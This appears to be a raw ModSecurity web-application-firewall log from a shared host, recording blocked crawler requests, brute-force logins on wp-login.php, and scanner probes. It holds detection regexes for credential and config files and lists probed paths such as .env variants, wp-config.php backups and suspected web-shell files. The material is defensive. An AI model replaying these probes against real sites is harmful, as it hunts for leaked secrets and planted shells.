[Tue May 26 19:21:24.209240 2026] [security2:error] [pid 37506:tid 37752] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlWwKctTPx5f8aOzkdrgAAAHQ"]
[Tue May 26 19:21:25.269560 2026] [security2:error] [pid 37506:tid 37631] [remote 47.128.46.77:49760] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "bhavisharchitects.com"] [uri "/2015a-AiravataKandy.php"] [unique_id "ahWlXQKctTPx5f8aOzkd0wAAJXw"]
[Tue May 26 19:21:25.939647 2026] [security2:error] [pid 37506:tid 37659] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlXQKctTPx5f8aOzkd3QAAABc"]
[Tue May 26 19:21:28.028698 2026] [security2:error] [pid 37506:tid 37713] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlXwKctTPx5f8aOzkeGQAAAE0"]
[Tue May 26 19:21:30.514248 2026] [security2:error] [pid 37506:tid 37713] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlYgKctTPx5f8aOzkeYwAAAE0"]
[Tue May 26 19:21:30.720584 2026] [security2:error] [pid 37506:tid 37544] [remote 141.95.202.18:36832] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlYgKctTPx5f8aOzkebwAAPSU"]
[Tue May 26 19:21:33.052296 2026] [security2:error] [pid 37506:tid 37689] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlZAKctTPx5f8aOzkeoAAAADU"]
[Tue May 26 19:21:33.928266 2026] [security2:error] [pid 37506:tid 37616] [remote 208.109.188.137:41638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlZQKctTPx5f8aOzke7gAAFG0"]
[Tue May 26 19:21:33.964988 2026] [security2:error] [pid 37506:tid 37599] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/.env"] [unique_id "ahWlZQKctTPx5f8aOzke7wAAeVw"]
[Tue May 26 19:21:34.949248 2026] [security2:error] [pid 37506:tid 37677] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlZgKctTPx5f8aOzkfAgAAACk"]
[Tue May 26 19:21:36.037935 2026] [security2:error] [pid 37506:tid 37509] [remote 208.109.188.137:41638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlZwKctTPx5f8aOzkfKgAADQI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:21:37.486062 2026] [security2:error] [pid 37506:tid 37642] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlaAKctTPx5f8aOzkfSgAAAAY"]
[Tue May 26 19:21:37.619751 2026] [security2:error] [pid 37506:tid 37691] [client 85.208.96.201:26810] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-29-august-2/day/2025-04-08/"] [unique_id "ahWlaQKctTPx5f8aOzkfUwAAADc"]
[Tue May 26 19:21:37.619892 2026] [security2:error] [pid 37506:tid 37691] [client 85.208.96.201:26810] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-29-august-2/day/2025-04-08/"] [unique_id "ahWlaQKctTPx5f8aOzkfUwAAADc"]
[Tue May 26 19:21:39.439541 2026] [security2:error] [pid 37506:tid 37673] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlawKctTPx5f8aOzkfhAAAACU"]
[Tue May 26 19:21:41.532779 2026] [security2:error] [pid 37506:tid 37630] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/.env.backup"] [unique_id "ahWlbQKctTPx5f8aOzkf6gAANXs"]
[Tue May 26 19:21:41.987290 2026] [security2:error] [pid 37506:tid 37526] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/.env.old"] [unique_id "ahWlbQKctTPx5f8aOzkf_gAAbBM"]
[Tue May 26 19:21:42.094015 2026] [security2:error] [pid 37506:tid 37535] [remote 162.240.102.228:40416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.102.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWlbQKctTPx5f8aOzkf_AAABRw"]
[Tue May 26 19:21:42.253792 2026] [security2:error] [pid 37506:tid 37664] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlbQKctTPx5f8aOzkf-AAAABw"]
[Tue May 26 19:21:42.388766 2026] [security2:error] [pid 37506:tid 37542] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/.env.bak"] [unique_id "ahWlbgKctTPx5f8aOzkgCwAAXSM"]
[Tue May 26 19:21:42.495188 2026] [security2:error] [pid 37506:tid 37527] [remote 162.240.102.228:40416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.102.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWlbgKctTPx5f8aOzkgDwAAIBQ"], referer: https://filosha.com/wp-login.php
[Tue May 26 19:21:43.857885 2026] [security2:error] [pid 37506:tid 37551] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/config/.env"] [unique_id "ahWlbwKctTPx5f8aOzkgPAAAJCw"]
[Tue May 26 19:21:44.190682 2026] [security2:error] [pid 37506:tid 37629] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/app/.env"] [unique_id "ahWlcAKctTPx5f8aOzkgRgAAFXo"]
[Tue May 26 19:21:44.429646 2026] [security2:error] [pid 37506:tid 37534] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/src/.env"] [unique_id "ahWlcAKctTPx5f8aOzkgSwAAVRs"]
[Tue May 26 19:21:44.499298 2026] [security2:error] [pid 37506:tid 37732] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlcAKctTPx5f8aOzkgPwAAAGA"]
[Tue May 26 19:21:44.662939 2026] [security2:error] [pid 37506:tid 37603] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/backend/.env"] [unique_id "ahWlcAKctTPx5f8aOzkgUgAAK2A"]
[Tue May 26 19:21:44.926448 2026] [security2:error] [pid 37506:tid 37547] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/api/.env"] [unique_id "ahWlcAKctTPx5f8aOzkgVwAARyg"]
[Tue May 26 19:21:45.393686 2026] [security2:error] [pid 37506:tid 37549] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/config.php"] [unique_id "ahWlcQKctTPx5f8aOzkgbAAAcyo"]
[Tue May 26 19:21:45.521639 2026] [security2:error] [pid 37506:tid 37544] [remote 38.95.35.74:38892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlcQKctTPx5f8aOzkgbQAAeiU"]
[Tue May 26 19:21:45.764598 2026] [security2:error] [pid 37506:tid 37700] [client 113.176.182.252:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlcQKctTPx5f8aOzkgbgAAAEA"]
[Tue May 26 19:21:45.786607 2026] [security2:error] [pid 37506:tid 37540] [remote 38.95.35.74:38892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlcQKctTPx5f8aOzkgdQAAMiE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:21:46.310246 2026] [security2:error] [pid 37506:tid 37557] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/settings.php"] [unique_id "ahWlcgKctTPx5f8aOzkggAAALDI"]
[Tue May 26 19:21:46.541483 2026] [security2:error] [pid 37506:tid 37546] [remote 92.205.109.21:57026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlcgKctTPx5f8aOzkghAAAXSc"]
[Tue May 26 19:21:46.667058 2026] [security2:error] [pid 37506:tid 37555] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/wp-config.php"] [unique_id "ahWlcgKctTPx5f8aOzkgjgAAWzA"]
[Tue May 26 19:21:46.771053 2026] [security2:error] [pid 37506:tid 37573] [remote 92.205.109.21:57026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlcgKctTPx5f8aOzkgjwAAaUI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:21:47.123383 2026] [security2:error] [pid 37506:tid 37564] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/config.php.bak"] [unique_id "ahWlcwKctTPx5f8aOzkgnAAAGjk"]
[Tue May 26 19:21:47.212385 2026] [security2:error] [pid 37506:tid 37691] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlcgKctTPx5f8aOzkglQAAADc"]
[Tue May 26 19:21:47.452507 2026] [security2:error] [pid 37506:tid 37553] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/wp-config.php.backup"] [unique_id "ahWlcwKctTPx5f8aOzkgoAAASy4"]
[Tue May 26 19:21:48.303085 2026] [security2:error] [pid 37506:tid 37558] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/wp-config.php.bak"] [unique_id "ahWldAKctTPx5f8aOzkgwwAAHzM"]
[Tue May 26 19:21:48.556200 2026] [security2:error] [pid 37506:tid 37672] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWldAKctTPx5f8aOzkgvAAAACQ"]
[Tue May 26 19:21:48.595077 2026] [security2:error] [pid 37506:tid 37578] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/wp-config.php.old"] [unique_id "ahWldAKctTPx5f8aOzkgxwAALUc"]
[Tue May 26 19:21:48.935370 2026] [security2:error] [pid 37506:tid 37559] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/wp-config.php.save"] [unique_id "ahWldAKctTPx5f8aOzkg0gAASTQ"]
[Tue May 26 19:21:49.168803 2026] [security2:error] [pid 37506:tid 37548] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/wp-config.php.swp"] [unique_id "ahWldQKctTPx5f8aOzkg2gAAdyk"]
[Tue May 26 19:21:49.876470 2026] [security2:error] [pid 37506:tid 37556] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/wp-config.php.txt"] [unique_id "ahWldQKctTPx5f8aOzkg7QAAPzE"]
[Tue May 26 19:21:51.322752 2026] [security2:error] [pid 37506:tid 37729] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWldgKctTPx5f8aOzkhDwAAAF0"]
[Tue May 26 19:21:53.555766 2026] [security2:error] [pid 37506:tid 37669] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWleQKctTPx5f8aOzkhUQAAACE"]
[Tue May 26 19:21:55.866666 2026] [security2:error] [pid 37506:tid 37744] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlewKctTPx5f8aOzkhpAAAAGw"]
[Tue May 26 19:21:57.942656 2026] [security2:error] [pid 37506:tid 37717] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlfQKctTPx5f8aOzkh6gAAAFE"]
[Tue May 26 19:21:58.112065 2026] [security2:error] [pid 37506:tid 37611] [remote 45.148.10.5:39518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.goadityaholidays.com.whitesun.in"] [uri "/web.config"] [unique_id "ahWlfgKctTPx5f8aOzkh_QAAZ2g"]
[Tue May 26 19:21:58.581346 2026] [security2:error] [pid 37506:tid 37731] [client 14.191.124.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWlfgKctTPx5f8aOzkiFQAAAF8"], referer: https://www.anujtradingco.com/
[Tue May 26 19:21:58.652352 2026] [security2:error] [pid 37506:tid 37509] [remote 103.95.119.103:47628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlfgKctTPx5f8aOzkiDQAALAI"]
[Tue May 26 19:21:58.676262 2026] [security2:error] [pid 37506:tid 37761] [client 20.195.182.1:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stockmarketanalysis.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWlfgKctTPx5f8aOzkiFwAAAH0"]
[Tue May 26 19:21:58.676359 2026] [security2:error] [pid 37506:tid 37761] [client 20.195.182.1:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.stockmarketanalysis.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWlfgKctTPx5f8aOzkiFwAAAH0"]
[Tue May 26 19:21:59.050195 2026] [security2:error] [pid 37506:tid 37756] [client 20.195.182.1:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stockmarketanalysis.in"] [uri "/166.php"] [unique_id "ahWlfwKctTPx5f8aOzkiIQAAAHg"]
[Tue May 26 19:21:59.050323 2026] [security2:error] [pid 37506:tid 37756] [client 20.195.182.1:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.stockmarketanalysis.in"] [uri "/166.php"] [unique_id "ahWlfwKctTPx5f8aOzkiIQAAAHg"]
[Tue May 26 19:21:59.421023 2026] [security2:error] [pid 37506:tid 37758] [client 20.195.182.1:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.182.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stockmarketanalysis.in"] [uri "/ups.php"] [unique_id "ahWlfwKctTPx5f8aOzkiNAAAAHo"]
